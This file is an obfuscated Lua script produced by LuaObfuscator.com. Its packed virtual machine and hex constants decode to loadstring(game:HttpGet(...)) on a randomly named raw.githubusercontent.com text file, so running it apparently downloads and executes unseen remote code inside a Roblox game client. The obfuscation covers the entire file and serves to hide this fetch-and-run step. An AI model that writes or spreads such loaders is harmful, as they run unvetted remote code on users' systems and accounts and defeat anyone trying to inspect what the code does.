--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=v2(v0(v30,16));if v19 then local v109=0;local v110;while true do if (v109==1) then return v110;end if (v109==0) then v110=v5(v87,v19);v19=nil;v109=1;end end else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((879 -(282 + 595))^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-((1639 -(1523 + 114)) -1))) + (620 -(555 + 64)))) ;return v88-(v88%(932 -(857 + 74))) ;else local v89=(570 -(330 + 37 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v89 + v89))>=v89) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (12 -9) );v18=v18 + (121 -(32 + 85)) ;return (v40 * ((39222453 -22780638) + 335401)) + (v39 * (14533 + 51003)) + (v38 * ((2241 -1028) -(892 + 65))) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(353 -(87 + 263))) then if (v46==((574 -394) -(29 + 38 + 113))) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else local v124=0 -0 ;while true do if (v124==(0 + 0)) then v46=3 -2 ;v44=952 -(802 + (588 -(145 + 293))) ;break;end end end elseif (v46==2047) then return ((v45==(0 -(430 -(44 + 386)))) and (v47 * ((1 -(1486 -(998 + 488)))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((999 -(915 + 82))^(147 -95)))) ;end if (v41==(0 + 0)) then v42=v23();v43=v23();v41=1 -0 ;end if (v41==(1189 -(1069 + 38 + 80))) then v46=v20(v43,47 -26 ,67 -36 );v47=((v20(v43,6 + 26 )==(1 -0)) and  -(1 + 0 + 0)) or 1 ;v41=794 -(368 + 423) ;end if (v41==(3 -2)) then v44=1;v45=(v20(v43,19 -(10 + 8) ,76 -56 ) * (2^(474 -(416 + 26)))) + v42 ;v41=2;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(773 -(201 + 571)) );v18=v18 + v48 ;local v50={};for v66=1139 -(116 + 1022) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0 + 0 ;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if (v90~= #"[") then else if (v91== #"}") then v92=(function() return v93()~=0 ;end)();elseif (v91==(1852 -(1409 + 441))) then v92=(function() return v94();end)();elseif (v91~= #"xnx") then else v92=(function() return v95();end)();end v96[v97]=(function() return v92;end)();break;end if (v90~=(718 -(15 + 703))) then else local v116=(function() return 867 -(550 + 317) ;end)();local v117=(function() return;end)();while true do if (v116==0) then v117=(function() return 0 -0 ;end)();while true do if (0==v117) then v91=(function() return v93();end)();v92=(function() return nil;end)();v117=(function() return 1 + 0 ;end)();end if (v117==1) then v90=(function() return  #"]";end)();break;end end break;end end end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v52=(function() return function(v98,v99,v100) local v101=(function() return 0 -0 ;end)();local v102=(function() return;end)();while true do if ((438 -(262 + 176))~=v101) then else v102=(function() return 0;end)();while true do if (v102~=(0 -0)) then else local v125=(function() return 0;end)();while true do if ((1721 -(345 + 1376))==v125) then local v130=(function() return 688 -(198 + 490) ;end)();while true do if (v130~=(0 -0)) then else v98[v99-#"\\" ]=(function() return v100();end)();return v98,v99,v100;end end end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"~",v57 do FlatIdent_44839,Type,Cons,v21,v24,v25,v58,v68=(function() return v51(FlatIdent_44839,Type,Cons,v21,v24,v25,v58,v68);end)();end v56[ #"-19"]=(function() return v21();end)();for v69= #"{",v23() do local v70=(function() return v21();end)();if (v20(v70, #"\\", #"~")~=(1990 -(582 + 1408))) then else local v105=(function() return 1206 -(696 + 510) ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v105~=3) then else if (v20(v107, #"asd", #"xnx")== #"|") then v108[ #".dev"]=(function() return v58[v108[ #"asd1"]];end)();end v53[v69]=(function() return v108;end)();break;end if (v105==2) then if (v20(v107, #",", #"~")~= #"}") then else v108[3 -1 ]=(function() return v58[v108[2]];end)();end if (v20(v107,1264 -(1091 + 171) ,7 -5 )~= #"~") then else v108[ #"gha"]=(function() return v58[v108[ #"asd"]];end)();end v105=(function() return 3;end)();end if (v105~=(0 + 0)) then else local v121=(function() return 0;end)();local v122=(function() return;end)();while true do if (v121~=(0 -0)) then else v122=(function() return 0 -0 ;end)();while true do if (v122==(374 -(123 + 251))) then local v134=(function() return 0 -0 ;end)();while true do if ((698 -(208 + 490))~=v134) then else v106=(function() return v20(v70,1 + 1 , #"19(");end)();v107=(function() return v20(v70, #".dev",3 + 3 );end)();v134=(function() return 837 -(660 + 176) ;end)();end if (v134~=(1 + 0)) then else v122=(function() return 1 + 0 ;end)();break;end end end if (v122==(203 -(14 + 188))) then v105=(function() return 1;end)();break;end end break;end end end if (1~=v105) then else local v123=(function() return 675 -(534 + 141) ;end)();while true do if (v123==(1 + 0)) then v105=(function() return 1 + 1 ;end)();break;end if (v123~=0) then else local v129=(function() return 1636 -(1373 + 263) ;end)();while true do if (v129~=(1 + 0)) then else v123=(function() return 1 + 0 ;end)();break;end if (v129==(1000 -(451 + 549))) then v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==0) then local v161=(function() return 0;end)();local v162=(function() return;end)();while true do if (v161~=(0 -0)) then else v162=(function() return 0 -0 ;end)();while true do if (v162==(0 -0)) then v108[ #"gha"]=(function() return v22();end)();v108[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v106== #"\\") then v108[ #"xxx"]=(function() return v23();end)();elseif (v106==2) then v108[ #"-19"]=(function() return v23() -((1386 -(746 + 638))^(44 -28)) ;end)();elseif (v106~= #"xnx") then else local v185=(function() return 0 + 0 ;end)();local v186=(function() return;end)();while true do if ((0 + 0)==v185) then v186=(function() return 0;end)();while true do if (v186~=(396 -(115 + 281))) then else v108[ #"91("]=(function() return v23() -(2^(37 -21)) ;end)();v108[ #".dev"]=(function() return v22();end)();break;end end break;end end end v129=(function() return 1 + 0 ;end)();end end end end end end end end for v71= #",",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 + 0 + 0 ];local v64=v60[562 -(306 + 254) ];local v65=v60[1 + 2 ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=1 -0 ;local v77= -((1881 -(15 + 398)) -(899 + 568));local v78={};local v79={...};local v80=v12("#",...) -(1 + 0) ;local v81={};local v82={};for v103=0,v80 do if (v103>=v74) then v78[v103-v74 ]=v79[v103 + 1 ];else v82[v103]=v79[v103 + (2 -1) ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do local v104=603 -(268 + (1317 -(18 + 964))) ;while true do if (v104==(291 -(60 + 230))) then if ((v85<=6) or (3546<2322)) then if ((v85<=2) or (2082==4773)) then if (v85<=(572 -(426 + 146))) then do return;end elseif (v85>(1 + 0)) then v82[v84[1458 -(282 + 1174) ]]=v84[814 -((2141 -1572) + 242) ];else v82[v84[(3 + 2) -3 ]]();end elseif (v85<=(1 + 2 + 1)) then if (v85==(1027 -(706 + 318))) then v82[v84[1253 -(721 + 530) ]]=v84[1274 -(945 + 326) ];else local v139=(850 -(20 + 830)) -0 ;local v140;local v141;while true do if (v139==(0 + 0 + (126 -(116 + 10)))) then v140=v84[702 -(21 + 250 + 429) ];v141=v82[v84[3 + 0 ]];v139=(2239 -(542 + 196)) -(1408 + 92) ;end if ((3244>1055) and ((1087 -(461 + 625))==v139)) then v82[v140 + 1 ]=v141;v82[v140]=v141[v84[4]];break;end end end elseif (v85==(1293 -(993 + 295))) then do return;end else local v142=v84[1 + 1 ];v82[v142]=v82[v142](v13(v82,v142 + (1172 -(418 + 753)) ,v77));end elseif (v85<=(18 -9)) then if (v85<=(1 + 2 + 4)) then local v131=0 + 0 ;local v132;local v133;while true do if ((v131==(0 + 0 + 0)) or (3313<=1778)) then v132=v84[1 + 1 ];v133=v82[v84[532 -(406 + 123) ]];v131=(638 + 1132) -(1749 + 20) ;end if (v131==(1 + 0)) then v82[v132 + 1 ]=v133;v82[v132]=v133[v84[4]];break;end end elseif (v85==((3504 -2174) -(1249 + 73))) then v82[v84[1 + 1 ]]=v62[v84[1148 -(466 + 679) ]];else v82[v84[4 -2 ]]=v62[v84[3]];end elseif (v85<=((79 -48) -20)) then if ((v85>(1910 -(106 + 1794))) or (1421>=2104)) then local v148=1551 -(1126 + 425) ;local v149;local v150;local v151;local v152;while true do if ((1812<=3249) and (v148==(1 + 0))) then v77=(v151 + v149) -1 ;v152=0 + 0 ;v148=5 -3 ;end if (v148==(5 -3)) then for v176=v149,v77 do v152=v152 + (115 -(4 + 110)) ;v82[v176]=v150[v152];end break;end if (v148==0) then v149=v84[586 -(57 + 527) ];v150,v151=v75(v82[v149](v13(v82,v149 + (406 -(118 + 287)) ,v84[3])));v148=1428 -(41 + (5432 -4046)) ;end end else local v153=103 -(17 + 86) ;local v154;local v155;local v156;local v157;while true do if ((1623<=1957) and (v153==(0 + 0))) then v154=v84[(1124 -(118 + 1003)) -1 ];v155,v156=v75(v82[v154](v13(v82,v154 + (2 -(2 -1)) ,v84[169 -(122 + (421 -(142 + 235))) ])));v153=(4 -3) -0 ;end if ((4412==4412) and (v153==(6 -4))) then for v179=v154,v77 do v157=v157 + 1 + 0 ;v82[v179]=v155[v157];end break;end if ((1750>=842) and (v153==(1 + 0))) then v77=(v156 + v154) -(1 + (977 -(553 + 424))) ;v157=(0 -0) -0 ;v153=2;end end end elseif ((4372>1850) and (v85>(77 -(27 + 3 + 35)))) then v82[v84[2 + 0 ]]();else local v158=v84[1259 -(1043 + 214) ];v82[v158]=v82[v158](v13(v82,v158 + (3 -2) ,v77));end v76=v76 + (1213 -(321 + 2 + 889)) ;break;end if (v104==((0 + 0) -(0 + 0))) then v84=v72[v76];v85=v84[581 -(361 + 219) ];v104=(184 + 137) -((114 -61) + (743 -476)) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574038D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F536C61646B79707570732Q672F4733326F6169336269616E337031707533793379337968776C6F61677870766C6D61626D736475697167716978622F726566732F68656164732F6D61696E2F416168736B656C776B7762656266627563696E66337665693262772E74787400083Q0012093Q00013Q001209000100023Q002007000100010003001203000300044Q000B000100034Q000C5Q00022Q00013Q000100016Q00017Q00",v9(),...);